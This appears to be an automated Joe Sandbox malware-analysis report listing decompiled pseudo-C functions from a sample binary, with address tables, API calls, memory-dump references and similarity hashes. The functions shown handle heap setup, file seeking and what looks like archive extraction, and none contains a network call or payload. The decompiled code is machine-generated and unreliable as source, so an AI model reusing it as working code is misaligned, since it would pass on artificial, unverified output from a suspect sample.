                              0x0040525b
                              0x00405263
                              0x00405263
                              0x00405246
                              0x0040524e
                              0x00000000

                              APIs
                              • __EH_prolog.LIBCMT ref: 004051CD
                                • Part of subcall function 0040511B: __EH_prolog.LIBCMT ref: 00405120
                                • Part of subcall function 004058CD: __EH_prolog.LIBCMT ref: 004058D2
                              • GetLastError.KERNEL32(?,?,?,?,00000003,?,00000000,?,00000000), ref: 0040522C
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog$ErrorLast
                              • String ID:
                              • API String ID: 2901101390-0
                              • Opcode ID: d33f8126ed8318c7129a01f11b7322f40edc7a38c1873fe00e643a2a39180484
                              • Instruction ID: 4ca71d6396368880cce983a38ddafe9bc91d36a7a330c4fa26da9ce64be84c4d
                              • Opcode Fuzzy Hash: d33f8126ed8318c7129a01f11b7322f40edc7a38c1873fe00e643a2a39180484
                              • Instruction Fuzzy Hash: 43114831C00A059ACF14FBA5D4426EFBB70DF51368F1042BFA462771E28B7C1A4ACE19
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004159F8 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004159F8(void* __ecx, intOrPtr _a4) {
				void* _t6;
				intOrPtr _t8;
				void* _t9;
				void* _t10;
				void* _t12;

				_t12 = __ecx;
				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				_t15 = _t6;
				 *0x425a34 = _t6;
				if(_t6 == 0) {
					L7:
					return 0;
				} else {
					_t8 = E004158B0(_t12, _t15);
					 *0x425a38 = _t8;
					if(_t8 != 3) {
						__eflags = _t8 - 2;
						if(_t8 != 2) {
							goto L8;
						} else {
							_t10 = E0041659C();
							goto L5;
						}
					} else {
						_t10 = E00415A55(0x3f8);
						L5:
						if(_t10 != 0) {
							L8:
							_t9 = 1;
							return _t9;
						} else {
							HeapDestroy( *0x425a34);
							goto L7;
						}
					}
				}
			}








                              0x004159f8
                              0x00415a09
                              0x00415a0f
                              0x00415a11
                              0x00415a16
                              0x00415a4e
                              0x00415a50
                              0x00415a18
                              0x00415a18
                              0x00415a20
                              0x00415a25
                              0x00415a34
                              0x00415a37
                              0x00000000
                              0x00415a39
                              0x00415a39
                              0x00000000
                              0x00415a39
                              0x00415a27
                              0x00415a2c
                              0x00415a3e
                              0x00415a40
                              0x00415a51
                              0x00415a53
                              0x00415a54
                              0x00415a42
                              0x00415a48
                              0x00000000
                              0x00415a48
                              0x00415a40
                              0x00415a25

                              APIs
                              • HeapCreate.KERNELBASE(00000000,00001000,00000000,00414B62,00000001), ref: 00415A09
                                • Part of subcall function 004158B0: GetVersionExA.KERNEL32 ref: 004158CF
                              • HeapDestroy.KERNEL32 ref: 00415A48
                                • Part of subcall function 00415A55: HeapAlloc.KERNEL32(00000000,00000140,00415A31,000003F8), ref: 00415A62
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: Heap$AllocCreateDestroyVersion
                              • String ID:
                              • API String ID: 2507506473-0
                              • Opcode ID: 825b9816dc88181ec874f225c5ca0d214e5516542b2a7945f872998de4828b81
                              • Instruction ID: d610f17f35f819288534aaa08ec9d41b03b5a17a7fe04688d897b1e7918b3c37
                              • Opcode Fuzzy Hash: 825b9816dc88181ec874f225c5ca0d214e5516542b2a7945f872998de4828b81
                              • Instruction Fuzzy Hash: 00F03070696A01EBDB206B715DCA7E62A949F84799F104637F540C85A0EB7884C19A1D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00405ACE Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                              Download Yara Rule
                              C-Code - Quality: 80%
                              			E00405ACE(void** __ecx, long _a4, long _a8, long _a12, long* _a16) {
				long _v8;
				long _v12;
				long _t12;
				long _t13;
				long* _t14;

				_push(__ecx);
				_push(__ecx);
				_t12 = _a4;
				_v8 = _a8;
				_v12 = _t12;
				_t13 = SetFilePointer( *__ecx, _t12,  &_v8, _a12); // executed
				_v12 = _t13;
				if(_t13 != 0xffffffff || GetLastError() == 0) {
					_t14 = _a16;
					 *_t14 = _v12;
					_t14[1] = _v8;
					return 1;
				} else {
					return 0;
				}
			}








                              0x00405ad1
                              0x00405ad2
                              0x00405ad9
                              0x00405adc
                              0x00405ae2
                              0x00405ae9
                              0x00405af2
                              0x00405af5
                              0x00405b05
                              0x00405b0b
                              0x00405b10
                              0x00000000
                              0x00405b01
                              0x00000000
                              0x00405b01

                              APIs
                              • SetFilePointer.KERNELBASE(?,?,?,?), ref: 00405AE9
                              • GetLastError.KERNEL32(?,?,?,?), ref: 00405AF7
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: ErrorFileLastPointer
                              • String ID:
                              • API String ID: 2976181284-0
                              • Opcode ID: 76489df8c25185c5262ec68b9c2ea30a41bcc890bee3aa4ad9f45433592c2f72
                              • Instruction ID: ae3098a1e04470c1e0e5e0b92581544958da7485e9b3b22056b888074196ff7d
                              • Opcode Fuzzy Hash: 76489df8c25185c5262ec68b9c2ea30a41bcc890bee3aa4ad9f45433592c2f72
                              • Instruction Fuzzy Hash: 89F0B7B4504208EFCB14CF54D9448AE7BF9EF49350B108169F815A7390D731AE00DF69
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040BBC9 Relevance: 2.0, APIs: 1, Instructions: 515COMMON
                              Download Yara Rule
                              C-Code - Quality: 88%
                              			E0040BBC9(signed char __edx) {
				signed int _t287;
				signed char _t289;
				signed int _t291;
				signed char _t292;
				signed char _t295;
				signed char _t305;
				intOrPtr _t307;
				signed char _t308;
				signed char _t314;
				intOrPtr _t315;
				signed char _t323;
				signed char _t325;
				signed char _t329;
				signed char _t330;
				signed char _t334;
				signed char _t335;
				signed char _t340;
				signed char _t345;
				signed char _t349;
				signed char _t351;
				signed char _t352;
				signed char _t356;
				signed char _t368;
				signed char _t372;
				signed int _t380;
				intOrPtr _t388;
				intOrPtr _t397;
				signed char _t401;
				signed char _t407;
				signed char _t408;
				intOrPtr _t410;
				intOrPtr _t475;
				signed char _t485;
				signed int _t488;
				signed char _t489;
				intOrPtr* _t490;
				signed int _t492;
				intOrPtr _t498;
				signed int _t501;
				signed int _t502;
				void* _t503;
				signed char _t506;
				signed int _t508;
				intOrPtr _t509;
				void* _t510;
				void* _t512;

				_t485 = __edx;
				_t287 = E00413954(E0041A262, _t510);
				_t407 = 0;
				 *(_t510 - 4) = 0;
				 *((char*)(_t510 - 0x4c)) = _t287 & 0xffffff00 |  *(_t510 + 0x14) != 0x00000000;
				_t289 =  *(_t510 + 0x18);
				 *((intOrPtr*)(_t510 - 0x10)) = _t512 - 0x124;
				 *(_t510 + 0x18) = _t289;
				if(_t289 != 0) {
					 *((intOrPtr*)( *_t289 + 4))(_t289);
				}
				 *(_t510 - 4) = 1;
				 *(_t510 - 0x1c) = _t407;
				 *(_t510 - 0x18) = _t407;
				 *((char*)(_t510 + 0x17)) =  *(_t510 + 0x10) == 0xffffffff;
				if( *((char*)(_t510 + 0x17)) != 0) {
					 *(_t510 + 0x10) =  *( *(_t510 + 8) + 0x7c);
				}
				if( *(_t510 + 0x10) != _t407) {
					E00402155(_t510 - 0x30);
					 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
					_t291 = 0;
					__eflags = 0;
					 *(_t510 - 4) = 2;
					 *(_t510 - 0x34) = 0;
					while(1) {
						__eflags = _t291 -  *(_t510 + 0x10);
						if(_t291 >=  *(_t510 + 0x10)) {
							break;
						}
						__eflags =  *((char*)(_t510 + 0x17));
						if( *((char*)(_t510 + 0x17)) == 0) {
							_t291 =  *( *(_t510 + 0xc) + _t291 * 4);
						}
						_t496 =  *(_t510 + 8);
						 *(_t510 - 0x38) = _t291;
						_t508 =  *( *((intOrPtr*)( *(_t510 + 8) + 0x1c8)) + _t291 * 4);
						__eflags = _t508 - 0xffffffff;
						if(_t508 != 0xffffffff) {
							_t380 =  *(_t510 - 0x28);
							__eflags = _t380 - _t407;
							if(_t380 == _t407) {
								L16:
								 *(_t510 - 0x7c) =  *(_t510 - 0x7c) | 0xffffffff;
								 *(_t510 - 0x78) = _t508;
								E0040C3F8(_t510 - 0x74);
								 *(_t510 - 0x5c) = _t407;
								 *(_t510 - 0x58) = _t407;
								_push(_t510 - 0x7c);
								 *(_t510 - 4) = 5;
								E0040C46D(_t510 - 0x30);
								 *(_t510 - 4) = 2;
								E004042AD(_t510 - 0x74);
								_t475 = E0040C281( *((intOrPtr*)( *((intOrPtr*)(_t496 + 0x58)) + _t508 * 4)));
								_t67 = _t510 - 0x1c;
								 *_t67 =  *(_t510 - 0x1c) + _t475;
								__eflags =  *_t67;
								_t388 =  *((intOrPtr*)( *((intOrPtr*)(_t510 - 0x24)) +  *(_t510 - 0x28) * 4 - 4));
								asm("adc [ebp-0x18], edx");
								 *((intOrPtr*)(_t388 + 0x20)) = _t475;
								 *(_t388 + 0x24) = _t485;
								L17:
								_t498 =  *((intOrPtr*)( *((intOrPtr*)(_t510 - 0x24)) +  *(_t510 - 0x28) * 4 - 4));
								_t410 =  *((intOrPtr*)( *((intOrPtr*)( *(_t510 + 8) + 0x1b4)) + _t508 * 4));
								_t509 =  *((intOrPtr*)(_t498 + 0x10));
								while(1) {
									_t393 =  *(_t510 - 0x38) - _t410;
									__eflags = _t509 -  *(_t510 - 0x38) - _t410;
									if(_t509 >  *(_t510 - 0x38) - _t410) {
										goto L13;
									}
									_t87 = _t498 + 8; // 0xa
									E0040C413(_t87, _t393 & 0xffffff00 | __eflags == 0x00000000);
									_t509 = _t509 + 1;
								}
								goto L13;
							}
							_t397 =  *((intOrPtr*)( *((intOrPtr*)(_t510 - 0x24)) + _t380 * 4 - 4));
							__eflags = _t508 -  *((intOrPtr*)(_t397 + 4));
							if(_t508 ==  *((intOrPtr*)(_t397 + 4))) {
								goto L17;
							}
							goto L16;
						} else {
							_push(_t508);
							_push(_t291);
							_push(E0040C30E(_t510 - 0x130));
							 *(_t510 - 4) = 3;
							E0040C46D(_t510 - 0x30);
							 *(_t510 - 4) = 2;
							E004042AD(_t510 - 0x128);
							L13:
							_t291 =  *(_t510 - 0x34) + 1;
							_t407 = 0;
							 *(_t510 - 0x34) = _t291;
							continue;
						}
					}
					_t292 =  *(_t510 + 0x18);
					__eflags =  *((intOrPtr*)( *_t292 + 0xc))(_t292,  *(_t510 - 0x1c),  *(_t510 - 0x18)) - _t407;
					if(__eflags == 0) {
						E0040AC6A(_t510 - 0x108, __eflags, 1);
						_push(0x38);
						 *(_t510 - 4) = 7;
						 *(_t510 - 0x40) = _t407;
						 *(_t510 - 0x3c) = _t407;
						 *(_t510 - 0x1c) = _t407;
						 *(_t510 - 0x18) = _t407;
						_t295 = E00403A76();
						 *(_t510 + 0x10) = _t295;
						__eflags = _t295 - _t407;
						 *(_t510 - 4) = 8;
						if(_t295 == _t407) {
							_t501 = 0;
							__eflags = 0;
						} else {
							_t501 = E004072A1(_t295);
						}
						_t488 = _t501;
						__eflags = _t501 - _t407;
						 *(_t510 - 4) = 7;
						 *(_t510 - 0x38) = _t488;
						 *(_t510 - 0x14) = _t501;
						if(_t501 != _t407) {
							 *((intOrPtr*)( *_t501 + 4))(_t501);
						}
						_push(_t407);
						 *(_t510 - 4) = 9;
						E00407334(_t501,  *(_t510 + 0x18));
						_t502 = 0;
						__eflags = 0;
						 *(_t510 + 0x14) = 0;
						while(1) {
							 *(_t488 + 0x28) =  *(_t510 - 0x1c);
							 *(_t488 + 0x2c) =  *(_t510 - 0x18);
							 *(_t488 + 0x20) =  *(_t510 - 0x40);
							 *(_t488 + 0x24) =  *(_t510 - 0x3c);
							_t489 = E00407410(_t488);
							__eflags = _t489 - _t407;
							if(_t489 != _t407) {
								break;
							}
							__eflags = _t502 -  *(_t510 - 0x28);
							if(_t502 <  *(_t510 - 0x28)) {
								_push(0x38);
								 *(_t510 - 0x48) = _t407;
								 *(_t510 - 0x44) = _t407;
								_t490 =  *((intOrPtr*)( *((intOrPtr*)(_t510 - 0x24)) + _t502 * 4));
								 *((intOrPtr*)(_t510 - 0x54)) =  *((intOrPtr*)(_t490 + 0x20));
								 *((intOrPtr*)(_t510 - 0x50)) =  *((intOrPtr*)(_t490 + 0x24));
								_t305 = E00403A76();
								 *(_t510 + 0xc) = _t305;
								__eflags = _t305 - _t407;
								 *(_t510 - 4) = 0xb;
								if(_t305 == _t407) {
									_t408 = 0;
									__eflags = 0;
								} else {
									_t408 = E0040C5E8(_t305);
								}
								__eflags = _t408;
								 *(_t510 - 0x34) = _t408;
								 *(_t510 - 4) = 9;
								 *(_t510 + 0x10) = _t408;
								if(_t408 != 0) {
									 *((intOrPtr*)( *_t408 + 4))(_t408);
								}
								 *(_t510 - 4) = 0xc;
								_t503 =  *(_t510 + 8) + 0x10;
								_t307 =  *_t490;
								__eflags = _t307 - 0xffffffff;
								if(_t307 == 0xffffffff) {
									_t307 =  *((intOrPtr*)( *((intOrPtr*)(_t503 + 0x1a4)) +  *(_t490 + 4) * 4));
								}
								__eflags =  *( *(_t510 + 8) + 0x1e0);
								_t173 = _t490 + 8; // 0x8
								_t308 = E0040C73A(_t408, _t503, 0, _t307, _t173,  *(_t510 + 0x18),  *((intOrPtr*)(_t510 - 0x4c)),  *(_t510 + 8) & 0xffffff00 |  *( *(_t510 + 8) + 0x1e0) != 0x00000000); // executed
								__eflags = _t308;
								 *(_t510 + 0xc) = _t308;
								if(_t308 == 0) {
									__eflags =  *_t490 - 0xffffffff;
									if( *_t490 == 0xffffffff) {
										_t492 =  *(_t490 + 4) << 2;
										 *(_t510 + 0xc) =  *( *((intOrPtr*)(_t503 + 0x48)) + _t492);
										 *(_t510 - 0x48) = E0040C2CD(_t503,  *(_t490 + 4));
										 *(_t510 - 0x44) = _t485;
										 *(_t510 - 4) = 0xe;
										_t485 =  *( *((intOrPtr*)(_t503 + 0x17c)) + ( *( *((intOrPtr*)(_t503 + 0x190)) + _t492) << 3) + 4);
										asm("adc edx, [esi+0x14c]");
										_t314 = E0040AD19(_t510 - 0x108, __eflags,  *((intOrPtr*)( *(_t510 + 8) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t503 + 0x17c)) + ( *( *((intOrPtr*)(_t503 + 0x190)) + _t492) << 3))) +  *((intOrPtr*)(_t503 + 0x148)), _t485,  *((intOrPtr*)(_t503 + 0xc)) + ( *( *((intOrPtr*)(_t503 + 0x190)) + _t492) << 3),  *(_t510 + 0xc),  *(_t510 + 0x10),  *(_t510 - 0x14)); // executed
										_t506 = _t314;
										__eflags = _t506 - 1;
										if(_t506 != 1) {
											__eflags = _t506 - 0x80004001;
											if(_t506 != 0x80004001) {
												__eflags = _t506;
												if(_t506 == 0) {
													_t315 =  *((intOrPtr*)(_t408 + 0x18));
													__eflags =  *((intOrPtr*)(_t408 + 0x28)) -  *((intOrPtr*)(_t315 + 8));
													if( *((intOrPtr*)(_t408 + 0x28)) ==  *((intOrPtr*)(_t315 + 8))) {
														 *(_t510 - 4) = 9;
														E00403800(_t510 + 0x10);
														L91:
														 *(_t510 + 0x14) =  *(_t510 + 0x14) + 1;
														 *(_t510 - 0x1c) =  *(_t510 - 0x1c) +  *((intOrPtr*)(_t510 - 0x54));
														_t488 =  *(_t510 - 0x38);
														_t502 =  *(_t510 + 0x14);
														asm("adc [ebp-0x18], eax");
														 *(_t510 - 0x40) =  *(_t510 - 0x40) +  *(_t510 - 0x48);
														asm("adc [ebp-0x3c], eax");
														_t407 = 0;
														continue;
													}
													_t506 = E0040CA4C(_t408, _t510, 2);
													_t323 =  *(_t510 + 0x10);
													__eflags = _t506;
													 *(_t510 - 4) = 9;
													if(_t506 == 0) {
														L86:
														__eflags = _t323;
														if(_t323 != 0) {
															 *((intOrPtr*)( *_t323 + 8))(_t323);
														}
														 *(_t510 - 4) = 9;
														goto L91;
													}
													__eflags = _t323;
													if(_t323 != 0) {
														 *((intOrPtr*)( *_t323 + 8))(_t323);
													}
													_t325 =  *(_t510 - 0x14);
													 *(_t510 - 4) = 7;
													__eflags = _t325;
													if(__eflags != 0) {
														 *((intOrPtr*)( *_t325 + 8))(_t325);
													}
													 *(_t510 - 4) = 2;
													E0040C380(_t510 - 0x108, __eflags);
													 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
													 *(_t510 - 4) = 0x12;
													L82:
													E004042D6();
													 *(_t510 - 4) = 1;
													E004042AD(_t510 - 0x30);
													_t329 =  *(_t510 + 0x18);
													 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
													__eflags = _t329;
													L83:
													if(__eflags != 0) {
														 *((intOrPtr*)( *_t329 + 8))(_t329);
													}
													_t330 = _t506;
													goto L92;
												}
												_t334 =  *(_t510 + 0x10);
												 *(_t510 - 4) = 9;
												__eflags = _t334;
												if(_t334 != 0) {
													 *((intOrPtr*)( *_t334 + 8))(_t334);
												}
												_t335 =  *(_t510 - 0x14);
												 *(_t510 - 4) = 7;
												__eflags = _t335;
												if(__eflags != 0) {
													 *((intOrPtr*)( *_t335 + 8))(_t335);
												}
												 *(_t510 - 4) = 2;
												E0040C380(_t510 - 0x108, __eflags);
												 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
												 *(_t510 - 4) = 0x11;
												goto L82;
											}
											_t506 = E0040CA4C(_t408, _t510, 1);
											_t323 =  *(_t510 + 0x10);
											__eflags = _t506;
											 *(_t510 - 4) = 9;
											if(_t506 == 0) {
												goto L86;
											}
											__eflags = _t323;
											if(_t323 != 0) {
												 *((intOrPtr*)( *_t323 + 8))(_t323);
											}
											_t340 =  *(_t510 - 0x14);
											 *(_t510 - 4) = 7;
											__eflags = _t340;
											if(__eflags != 0) {
												 *((intOrPtr*)( *_t340 + 8))(_t340);
											}
											 *(_t510 - 4) = 2;
											E0040C380(_t510 - 0x108, __eflags);
											 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
											 *(_t510 - 4) = 0x10;
											goto L82;
										}
										_t506 = E0040CA4C(_t408, _t510, 2);
										_t323 =  *(_t510 + 0x10);
										__eflags = _t506;
										 *(_t510 - 4) = 9;
										if(_t506 == 0) {
											goto L86;
										}
										__eflags = _t323;
										if(_t323 != 0) {
											 *((intOrPtr*)( *_t323 + 8))(_t323);
										}
										_t345 =  *(_t510 - 0x14);
										 *(_t510 - 4) = 7;
										__eflags = _t345;
										if(__eflags != 0) {
											 *((intOrPtr*)( *_t345 + 8))(_t345);
										}
										 *(_t510 - 4) = 2;
										E0040C380(_t510 - 0x108, __eflags);
										 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
										 *(_t510 - 4) = 0xf;
										goto L82;
									}
									_t349 =  *(_t510 + 0x10);
									 *(_t510 - 4) = 9;
									__eflags = _t349;
									if(_t349 != 0) {
										 *((intOrPtr*)( *_t349 + 8))(_t349);
									}
									goto L91;
								} else {
									_t351 =  *(_t510 + 0x10);
									 *(_t510 - 4) = 9;
									__eflags = _t351;
									if(_t351 != 0) {
										 *((intOrPtr*)( *_t351 + 8))(_t351);
									}
									_t352 =  *(_t510 - 0x14);
									 *(_t510 - 4) = 7;
									__eflags = _t352;
									if(__eflags != 0) {
										 *((intOrPtr*)( *_t352 + 8))(_t352);
									}
									 *(_t510 - 4) = 2;
									E0040C380(_t510 - 0x108, __eflags);
									 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
									 *(_t510 - 4) = 0xd;
									E004042D6();
									 *(_t510 - 4) = 1;
									E004042AD(_t510 - 0x30);
									_t356 =  *(_t510 + 0x18);
									 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
									__eflags = _t356;
									if(_t356 != 0) {
										 *((intOrPtr*)( *_t356 + 8))(_t356);
									}
									_t330 =  *(_t510 + 0xc);
									goto L92;
								}
							}
							 *(_t510 - 4) = 7;
							E00403800(_t510 - 0x14);
							 *(_t510 - 4) = 2;
							E0040C380(_t510 - 0x108, __eflags); // executed
							 *(_t510 - 4) = 1;
							E0040C435(_t510 - 0x30);
							_t144 = _t510 - 4;
							 *_t144 =  *(_t510 - 4) & 0x00000000;
							__eflags =  *_t144;
							E00403800(_t510 + 0x18);
							goto L36;
						}
						_t368 =  *(_t510 - 0x14);
						 *(_t510 - 4) = 7;
						__eflags = _t368 - _t407;
						if(__eflags != 0) {
							 *((intOrPtr*)( *_t368 + 8))(_t368);
						}
						 *(_t510 - 4) = 2;
						E0040C380(_t510 - 0x108, __eflags);
						 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
						 *(_t510 - 4) = 0xa;
						E004042D6();
						 *(_t510 - 4) = 1;
						E004042AD(_t510 - 0x30);
						_t372 =  *(_t510 + 0x18);
						 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
						__eflags = _t372 - _t407;
						if(_t372 != _t407) {
							 *((intOrPtr*)( *_t372 + 8))(_t372);
						}
						_t330 = _t489;
						goto L92;
					}
					 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
					 *(_t510 - 4) = 6;
					E004042D6();
					 *(_t510 - 4) = 1;
					E004042AD(_t510 - 0x30);
					_t329 =  *(_t510 + 0x18);
					 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
					__eflags = _t329 - _t407;
					goto L83;
				} else {
					_t401 =  *(_t510 + 0x18);
					 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
					if(_t401 != _t407) {
						 *((intOrPtr*)( *_t401 + 8))(_t401);
					}
					L36:
					_t330 = 0;
					L92:
					 *[fs:0x0] =  *((intOrPtr*)(_t510 - 0xc));
					return _t330;
				}
			}

















































                              0x0040bbc9
                              0x0040bbce
                              0x0040bbda
                              0x0040bbe1
                              0x0040bbe7
                              0x0040bbea
                              0x0040bbef
                              0x0040bbf2
                              0x0040bbf5
                              0x0040bbfa
                              0x0040bbfa
                              0x0040bc01
                              0x0040bc05
                              0x0040bc08
                              0x0040bc0b
                              0x0040bc13
                              0x0040bc1b
                              0x0040bc1b
                              0x0040bc21
                              0x0040bc40
                              0x0040bc45
                              0x0040bc4c
                              0x0040bc4c
                              0x0040bc4e
                              0x0040bc52
                              0x0040bc55
                              0x0040bc55
                              0x0040bc58
                              0x00000000
                              0x00000000
                              0x0040bc5e
                              0x0040bc62
                              0x0040bc67
                              0x0040bc67
                              0x0040bc6a
                              0x0040bc6d
                              0x0040bc76
                              0x0040bc79
                              0x0040bc7c
                              0x0040bcb2
                              0x0040bcb5
                              0x0040bcb7
                              0x0040bcc5
                              0x0040bcc5
                              0x0040bccc
                              0x0040bccf
                              0x0040bcd4
                              0x0040bcd7
                              0x0040bce0
                              0x0040bce1
                              0x0040bce5
                              0x0040bced
                              0x0040bcf1
                              0x0040bd04
                              0x0040bd09
                              0x0040bd09
                              0x0040bd09
                              0x0040bd0c
                              0x0040bd10
                              0x0040bd13
                              0x0040bd16
                              0x0040bd19
                              0x0040bd1f
                              0x0040bd2c
                              0x0040bd2f
                              0x0040bd32
                              0x0040bd35
                              0x0040bd37
                              0x0040bd39
                              0x00000000
                              0x00000000
                              0x0040bd43
                              0x0040bd46
                              0x0040bd4b
                              0x0040bd4b
                              0x00000000
                              0x0040bd32
                              0x0040bcbc
                              0x0040bcc0
                              0x0040bcc3
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040bc7e
                              0x0040bc7e
                              0x0040bc7f
                              0x0040bc8b
                              0x0040bc8f
                              0x0040bc93
                              0x0040bc9e
                              0x0040bca2
                              0x0040bca7
                              0x0040bcaa
                              0x0040bcab
                              0x0040bcad
                              0x00000000
                              0x0040bcad
                              0x0040bc7c
                              0x0040bd51
                              0x0040bd5f
                              0x0040bd61
                              0x0040bd98
                              0x0040bd9d
                              0x0040bd9f
                              0x0040bda3
                              0x0040bda6
                              0x0040bda9
                              0x0040bdac
                              0x0040bdaf
                              0x0040bdb5
                              0x0040bdb8
                              0x0040bdba
                              0x0040bdbe
                              0x0040bdcb
                              0x0040bdcb
                              0x0040bdc0
                              0x0040bdc7
                              0x0040bdc7
                              0x0040bdcd
                              0x0040bdcf
                              0x0040bdd1
                              0x0040bdd5
                              0x0040bdd8
                              0x0040bddb
                              0x0040bde0
                              0x0040bde0
                              0x0040bde3
                              0x0040bde9
                              0x0040bded
                              0x0040bdf2
                              0x0040bdf2
                              0x0040bdf4
                              0x0040bdf7
                              0x0040bdfc
                              0x0040be02
                              0x0040be08
                              0x0040be0e
                              0x0040be16
                              0x0040be18
                              0x0040be1a
                              0x00000000
                              0x00000000
                              0x0040be73
                              0x0040be76
                              0x0040beb5
                              0x0040beb7
                              0x0040beba
                              0x0040bebd
                              0x0040bec3
                              0x0040bec9
                              0x0040becc
                              0x0040bed2
                              0x0040bed5
                              0x0040bed7
                              0x0040bedb
                              0x0040bee8
                              0x0040bee8
                              0x0040bedd
                              0x0040bee4
                              0x0040bee4
                              0x0040beea
                              0x0040beec
                              0x0040beef
                              0x0040bef3
                              0x0040bef6
                              0x0040befb
                              0x0040befb
                              0x0040bf01
                              0x0040bf05
                              0x0040bf08
                              0x0040bf0a
                              0x0040bf0d
                              0x0040bf18
                              0x0040bf18
                              0x0040bf1e
                              0x0040bf29
                              0x0040bf39
                              0x0040bf3e
                              0x0040bf40
                              0x0040bf43
                              0x0040bfae
                              0x0040bfb1
                              0x0040bfd6
                              0x0040bfdc
                              0x0040bfe6
                              0x0040bff2
                              0x0040c010
                              0x0040c01a
                              0x0040c01e
                              0x0040c033
                              0x0040c038
                              0x0040c03a
                              0x0040c03d
                              0x0040c093
                              0x0040c099
                              0x0040c0ef
                              0x0040c0f1
                              0x0040c131
                              0x0040c137
                              0x0040c13a
                              0x0040c1c7
                              0x0040c238
                              0x0040c23d
                              0x0040c240
                              0x0040c243
                              0x0040c249
                              0x0040c24c
                              0x0040c24f
                              0x0040c255
                              0x0040c25b
                              0x0040c25e
                              0x00000000
                              0x0040c25e
                              0x0040c149
                              0x0040c14b
                              0x0040c14e
                              0x0040c150
                              0x0040c154
                              0x0040c1b7
                              0x0040c1b7
                              0x0040c1b9
                              0x0040c1be
                              0x0040c1be
                              0x0040c1c1
                              0x00000000
                              0x0040c1c1
                              0x0040c156
                              0x0040c158
                              0x0040c15d
                              0x0040c15d
                              0x0040c160
                              0x0040c163
                              0x0040c167
                              0x0040c169
                              0x0040c16e
                              0x0040c16e
                              0x0040c177
                              0x0040c17b
                              0x0040c180
                              0x0040c187
                              0x0040c18b
                              0x0040c18e
                              0x0040c196
                              0x0040c19a
                              0x0040c19f
                              0x0040c1a2
                              0x0040c1a6
                              0x0040c1a8
                              0x0040c1a8
                              0x0040c1ad
                              0x0040c1ad
                              0x0040c1b0
                              0x00000000
                              0x0040c1b0
                              0x0040c0f3
                              0x0040c0f6
                              0x0040c0fa
                              0x0040c0fc
                              0x0040c101
                              0x0040c101
                              0x0040c104
                              0x0040c107
                              0x0040c10b
                              0x0040c10d
                              0x0040c112
                              0x0040c112
                              0x0040c11b
                              0x0040c11f
                              0x0040c124
                              0x0040c12b
                              0x00000000
                              0x0040c12b
                              0x0040c0a4
                              0x0040c0a6
                              0x0040c0a9
                              0x0040c0ab
                              0x0040c0af
                              0x00000000
                              0x00000000
                              0x0040c0b5
                              0x0040c0b7
                              0x0040c0bc
                              0x0040c0bc
                              0x0040c0bf
                              0x0040c0c2
                              0x0040c0c6
                              0x0040c0c8
                              0x0040c0cd
